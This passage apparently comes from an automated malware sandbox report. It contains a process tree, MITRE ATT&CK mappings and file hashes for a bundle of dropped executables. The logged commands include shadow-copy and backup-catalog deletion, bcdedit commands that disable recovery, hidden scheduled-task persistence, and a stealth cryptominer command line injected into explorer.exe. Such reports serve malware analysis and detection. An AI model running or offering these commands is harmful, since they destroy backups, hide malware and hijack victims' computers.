                                                            "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pyqS0QZpyP6yNzpZ -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                            3⤵
                                                            • Executes dropped EXE
                                                            PID:5744
                                                          • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                            "C:\Program Files (x86)\lighteningplayer\data_load.exe" -ptOZRxMSUj4CLML9 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                            3⤵
                                                              PID:4208
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstA9A5.tmp\tempfile.ps1"
                                                              3⤵
                                                                PID:5804
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstA9A5.tmp\tempfile.ps1"
                                                                3⤵
                                                                  PID:1504
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstA9A5.tmp\tempfile.ps1"
                                                                  3⤵
                                                                  • Blocklisted process makes network request
                                                                  PID:5268
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstA9A5.tmp\tempfile.ps1"
                                                                  3⤵
                                                                    PID:5376
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstA9A5.tmp\tempfile.ps1"
                                                                    3⤵
                                                                      PID:2212
                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                      C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\KUFjMEd\KUFjMEd.dll" KUFjMEd
                                                                      3⤵
                                                                      • Loads dropped DLL
                                                                      PID:5208
                                                                      • C:\Windows\system32\rundll32.exe
                                                                        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\KUFjMEd\KUFjMEd.dll" KUFjMEd
                                                                        4⤵
                                                                        • Loads dropped DLL
                                                                        • Drops file in System32 directory
                                                                        PID:5284
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstA9A5.tmp\tempfile.ps1"
                                                                      3⤵
                                                                        PID:1636
                                                                        • C:\Windows\System32\Conhost.exe
                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          4⤵
                                                                          • Executes dropped EXE
                                                                          PID:4208
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstA9A5.tmp\tempfile.ps1"
                                                                        3⤵
                                                                          PID:5976
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstA9A5.tmp\tempfile.ps1"
                                                                          3⤵
                                                                            PID:5536
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstA9A5.tmp\tempfile.ps1"
                                                                            3⤵
                                                                              PID:4188
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstA9A5.tmp\tempfile.ps1"
                                                                              3⤵
                                                                                PID:4964
                                                                              • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                3⤵
                                                                                • Executes dropped EXE
                                                                                • Loads dropped DLL
                                                                                PID:5876
                                                                          • C:\Windows\system32\rUNdlL32.eXe
                                                                            rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                            1⤵
                                                                            • Process spawned unexpected child process
                                                                            • Suspicious use of WriteProcessMemory
                                                                            PID:500
                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                              rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                              2⤵
                                                                              • Loads dropped DLL
                                                                              • Modifies registry class
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              • Suspicious use of WriteProcessMemory
                                                                              PID:2332
                                                                          • C:\Users\Admin\AppData\Local\Temp\83B7.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\83B7.exe
                                                                            1⤵
                                                                            • Executes dropped EXE
                                                                            • Checks BIOS information in registry
                                                                            • Checks whether UAC is enabled
                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                            PID:5664
                                                                          • C:\Users\Admin\AppData\Local\Temp\85BC.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\85BC.exe
                                                                            1⤵
                                                                            • Executes dropped EXE
                                                                            • Enumerates connected drives
                                                                            PID:5544
                                                                            • C:\Users\Admin\AppData\Local\Temp\85BC.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\85BC.exe" -agent 0
                                                                              2⤵
                                                                              • Executes dropped EXE
                                                                              • Modifies extensions of user files
                                                                              • Drops file in Program Files directory
                                                                              • Drops file in Windows directory
                                                                              PID:4200
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
                                                                              2⤵
                                                                                PID:1416
                                                                                • C:\Windows\SysWOW64\vssadmin.exe
                                                                                  vssadmin delete shadows /all /quiet
                                                                                  3⤵
                                                                                  • Interacts with shadow copies
                                                                                  PID:3972
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
                                                                                2⤵
                                                                                  PID:4124
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                                  2⤵
                                                                                    PID:5484
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
                                                                                    2⤵
                                                                                      PID:4172
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
                                                                                      2⤵
                                                                                        PID:5856
                                                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                          wmic shadowcopy delete
                                                                                          3⤵
                                                                                            PID:5788
                                                                                        • C:\Windows\SysWOW64\notepad.exe
                                                                                          notepad.exe
                                                                                          2⤵
                                                                                            PID:5672
                                                                                        • C:\Users\Admin\AppData\Local\Temp\86C7.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\86C7.exe
                                                                                          1⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          PID:4232
                                                                                        • C:\Users\Admin\AppData\Local\Temp\89E5.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\89E5.exe
                                                                                          1⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          PID:5832
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5832 -s 1244
                                                                                            2⤵
                                                                                            • Program crash
                                                                                            PID:5448
                                                                                        • C:\Users\Admin\AppData\Local\Temp\8FF0.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\8FF0.exe
                                                                                          1⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:5000
                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe"
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:5152
                                                                                            • C:\Windows\System32\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit
                                                                                              3⤵
                                                                                                PID:5464
                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                  schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'
                                                                                                  4⤵
                                                                                                  • Creates scheduled task(s)
                                                                                                  PID:4952
                                                                                              • C:\Users\Admin\AppData\Local\Temp\services64.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\services64.exe"
                                                                                                3⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of SetThreadContext
                                                                                                PID:5716
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit
                                                                                                  4⤵
                                                                                                    PID:5924
                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                      schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'
                                                                                                      5⤵
                                                                                                      • Creates scheduled task(s)
                                                                                                      PID:4704
                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                    "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                    4⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:5016
                                                                                                  • C:\Windows\explorer.exe
                                                                                                    C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=prohashing.com:3359 --user=YS --pass=a=randomx --cpu-max-threads-hint=30 --cinit-idle-wait=1 --cinit-idle-cpu=60 --cinit-stealth
                                                                                                    4⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:5752
                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe"
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of SetThreadContext
                                                                                                PID:4828
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Local\Temp\services32.exe"' & exit
                                                                                                  3⤵
                                                                                                    PID:5736
                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                      schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Local\Temp\services32.exe"'
                                                                                                      4⤵
                                                                                                      • Creates scheduled task(s)
                                                                                                      PID:4532
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\services32.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\services32.exe"
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:5936
                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Local\Temp\services32.exe"' & exit
                                                                                                      4⤵
                                                                                                        PID:4736
                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                          schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Local\Temp\services32.exe"'
                                                                                                          5⤵
                                                                                                          • Creates scheduled task(s)
                                                                                                          PID:5292
                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
                                                                                                        "C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
                                                                                                        4⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:4460
                                                                                                • C:\Users\Admin\AppData\Local\Temp\931E.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\931E.exe
                                                                                                  1⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:5176
                                                                                                • C:\Users\Admin\AppData\Local\Temp\9AB0.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\9AB0.exe
                                                                                                  1⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:2224
                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                  1⤵
                                                                                                    PID:5268
                                                                                                  • C:\Windows\explorer.exe
                                                                                                    C:\Windows\explorer.exe
                                                                                                    1⤵
                                                                                                      PID:4116
                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                      1⤵
                                                                                                        PID:5304
                                                                                                      • C:\Windows\explorer.exe
                                                                                                        C:\Windows\explorer.exe
                                                                                                        1⤵
                                                                                                          PID:4960
                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                          1⤵
                                                                                                            PID:5964
                                                                                                          • C:\Windows\explorer.exe
                                                                                                            C:\Windows\explorer.exe
                                                                                                            1⤵
                                                                                                              PID:5248
                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                              1⤵
                                                                                                                PID:5640
                                                                                                              • C:\Windows\explorer.exe
                                                                                                                C:\Windows\explorer.exe
                                                                                                                1⤵
                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                PID:4840
                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                1⤵
                                                                                                                  PID:3588
                                                                                                                • C:\Windows\system32\vssvc.exe
                                                                                                                  C:\Windows\system32\vssvc.exe
                                                                                                                  1⤵
                                                                                                                    PID:5244
                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                    1⤵
                                                                                                                      PID:5776
                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                      c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                      1⤵
                                                                                                                        PID:5568

                                                                                                                      Network

                                                                                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                      Execution

                                                                                                                      Scheduled Task

                                                                                                                      1
                                                                                                                      T1053

                                                                                                                      Persistence

                                                                                                                      Modify Existing Service

                                                                                                                      1
                                                                                                                      T1031

                                                                                                                      Registry Run Keys / Startup Folder

                                                                                                                      1
                                                                                                                      T1060

                                                                                                                      Scheduled Task

                                                                                                                      1
                                                                                                                      T1053

                                                                                                                      BITS Jobs

                                                                                                                      1
                                                                                                                      T1197

                                                                                                                      Privilege Escalation

                                                                                                                      Scheduled Task

                                                                                                                      1
                                                                                                                      T1053

                                                                                                                      Defense Evasion

                                                                                                                      Modify Registry

                                                                                                                      3
                                                                                                                      T1112

                                                                                                                      Disabling Security Tools

                                                                                                                      1
                                                                                                                      T1089

                                                                                                                      File Deletion

                                                                                                                      2
                                                                                                                      T1107

                                                                                                                      Virtualization/Sandbox Evasion

                                                                                                                      1
                                                                                                                      T1497

                                                                                                                      BITS Jobs

                                                                                                                      1
                                                                                                                      T1197

                                                                                                                      Install Root Certificate

                                                                                                                      1
                                                                                                                      T1130

                                                                                                                      Credential Access

                                                                                                                      Credentials in Files

                                                                                                                      3
                                                                                                                      T1081

                                                                                                                      Discovery

                                                                                                                      Query Registry

                                                                                                                      7
                                                                                                                      T1012

                                                                                                                      Virtualization/Sandbox Evasion

                                                                                                                      1
                                                                                                                      T1497

                                                                                                                      System Information Discovery

                                                                                                                      7
                                                                                                                      T1082

                                                                                                                      Security Software Discovery

                                                                                                                      1
                                                                                                                      T1063

                                                                                                                      Peripheral Device Discovery

                                                                                                                      2
                                                                                                                      T1120

                                                                                                                      Collection

                                                                                                                      Data from Local System

                                                                                                                      3
                                                                                                                      T1005

                                                                                                                      Command and Control

                                                                                                                      Web Service

                                                                                                                      1
                                                                                                                      T1102

                                                                                                                      Impact

                                                                                                                      Inhibit System Recovery

                                                                                                                      2
                                                                                                                      T1490

                                                                                                                      Replay Monitor

                                                                                                                      Loading Replay Monitor...

                                                                                                                      Downloads

                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                        MD5

                                                                                                                        ed841d4c457ead52231fd3a2ccf235eb

                                                                                                                        SHA1

                                                                                                                        3c3e63ebce85e0ad02116131fa358f15bd685aaa

                                                                                                                        SHA256

                                                                                                                        1b71a0b2da18c33c8067989139712715013e134c0df6fd9d9a99944d665a182d

                                                                                                                        SHA512

                                                                                                                        da144b6500c3fa6e3becb02b9507424e28b4514c410ccc65c2bf2fde457076edef5de8130832d06e3d985bbbdb7ac132df8bf6aced68d9c5fc1ca27868f3fcc1

                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                        MD5

                                                                                                                        9be84148228d38d8a7aa04aa003ae49a

                                                                                                                        SHA1

                                                                                                                        83e6cafe58a6ad820ef295825f0d403e55710aae

                                                                                                                        SHA256

                                                                                                                        eae2eb93230894f646f45cec38cc20b03f5075e8b5b6c6639dc487c35e7ad573

                                                                                                                        SHA512

                                                                                                                        eb85383b426ec5cd211fafceaf24d438c8a0d6ac43be2cf9802748de505ada0b4d008548a08834dcc86b4c1b0e3fa5c1a4762e54ab5f6e55ea900e535bc4b578

                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                        MD5

                                                                                                                        3088bd5f4f651ec5377f1defd1e129f4

                                                                                                                        SHA1

                                                                                                                        b485189849fd0e5ce654675533bd2c01393e7131

                                                                                                                        SHA256

                                                                                                                        2622a76ba9eccefc86d2e299c154af850fb1940aef22822c79d61fd96c24085f

                                                                                                                        SHA512

                                                                                                                        b0da2157746f4683bdb87643e1474a19244ab1bd15564bd0ce428233ee480b99d8f6e40c26cf6608ad6f772f554cd4f2954d129279b8186ed2ea73f45ee446bf

                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                        MD5

                                                                                                                        43e28ee0860d0218d4915d9e49e55989

                                                                                                                        SHA1

                                                                                                                        37c8b97837201e51b0e233e40db591bfb31ebece

                                                                                                                        SHA256

                                                                                                                        afeb59edd1761894a709738130d02724d738c79c1cf3a6ca734339c1cf3d77ee

                                                                                                                        SHA512

                                                                                                                        8dfb992391da83cf079b36ce052156d3ffb600f58dd5acd69903bb8c5b4b352762997846ac390a3f8124359ed765bc326b2893c9ba9cf74c00d048b7dc99047e

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS439E3B14\libcurl.dll
                                                                                                                        MD5

                                                                                                                        d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                        SHA1

                                                                                                                        028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                        SHA256

                                                                                                                        0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                        SHA512

                                                                                                                        857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS439E3B14\libcurlpp.dll
                                                                                                                        MD5

                                                                                                                        e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                        SHA1

                                                                                                                        b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                        SHA256

                                                                                                                        43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                        SHA512

                                                                                                                        9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS439E3B14\libgcc_s_dw2-1.dll
                                                                                                                        MD5

                                                                                                                        9aec524b616618b0d3d00b27b6f51da1

                                                                                                                        SHA1

                                                                                                                        64264300801a353db324d11738ffed876550e1d3

                                                                                                                        SHA256

                                                                                                                        59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                        SHA512

                                                                                                                        0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS439E3B14\libstdc++-6.dll
                                                                                                                        MD5

                                                                                                                        5e279950775baae5fea04d2cc4526bcc

                                                                                                                        SHA1

                                                                                                                        8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                        SHA256

                                                                                                                        97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                        SHA512

                                                                                                                        666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS439E3B14\libwinpthread-1.dll
                                                                                                                        MD5

                                                                                                                        1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                        SHA1

                                                                                                                        fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                        SHA256

                                                                                                                        509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                        SHA512

                                                                                                                        3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS439E3B14\setup_install.exe
                                                                                                                        MD5

                                                                                                                        a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                        SHA1

                                                                                                                        e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                        SHA256

                                                                                                                        0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                        SHA512

                                                                                                                        c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS439E3B14\setup_install.exe
                                                                                                                        MD5

                                                                                                                        a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                        SHA1

                                                                                                                        e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                        SHA256

                                                                                                                        0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                        SHA512

                                                                                                                        c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS439E3B14\sonia_1.exe
                                                                                                                        MD5

                                                                                                                        6e43430011784cff369ea5a5ae4b000f

                                                                                                                        SHA1

                                                                                                                        5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                        SHA256

                                                                                                                        a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                        SHA512

                                                                                                                        33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS439E3B14\sonia_1.exe
                                                                                                                        MD5

                                                                                                                        6e43430011784cff369ea5a5ae4b000f

                                                                                                                        SHA1

                                                                                                                        5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                        SHA256

                                                                                                                        a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                        SHA512

                                                                                                                        33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS439E3B14\sonia_1.txt
                                                                                                                        MD5

                                                                                                                        6e43430011784cff369ea5a5ae4b000f

                                                                                                                        SHA1

                                                                                                                        5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                        SHA256

                                                                                                                        a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                        SHA512

                                                                                                                        33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS439E3B14\sonia_2.exe
                                                                                                                        MD5

                                                                                                                        18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                        SHA1

                                                                                                                        f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                        SHA256

                                                                                                                        365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                        SHA512

                                                                                                                        db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS439E3B14\sonia_2.txt
                                                                                                                        MD5

                                                                                                                        18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                        SHA1

                                                                                                                        f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                        SHA256

                                                                                                                        365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                        SHA512

                                                                                                                        db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS439E3B14\sonia_3.exe
                                                                                                                        MD5

                                                                                                                        ee658be7ea7269085f4004d68960e547

                                                                                                                        SHA1

                                                                                                                        979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                        SHA256

                                                                                                                        d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                        SHA512

                                                                                                                        fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS439E3B14\sonia_3.txt
                                                                                                                        MD5

                                                                                                                        ee658be7ea7269085f4004d68960e547

                                                                                                                        SHA1

                                                                                                                        979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                        SHA256

                                                                                                                        d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                        SHA512

                                                                                                                        fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS439E3B14\sonia_4.exe
                                                                                                                        MD5

                                                                                                                        6765fe4e4be8c4daf3763706a58f42d0

                                                                                                                        SHA1

                                                                                                                        cebb504bfc3097a95d40016f01123b275c97d58c

                                                                                                                        SHA256

                                                                                                                        755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                                                                        SHA512

                                                                                                                        c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS439E3B14\sonia_4.txt
                                                                                                                        MD5

                                                                                                                        6765fe4e4be8c4daf3763706a58f42d0

                                                                                                                        SHA1

                                                                                                                        cebb504bfc3097a95d40016f01123b275c97d58c

                                                                                                                        SHA256

                                                                                                                        755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                                                                        SHA512

                                                                                                                        c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS439E3B14\sonia_5.exe
                                                                                                                        MD5

                                                                                                                        0c3f670f496ffcf516fe77d2a161a6ee

                                                                                                                        SHA1

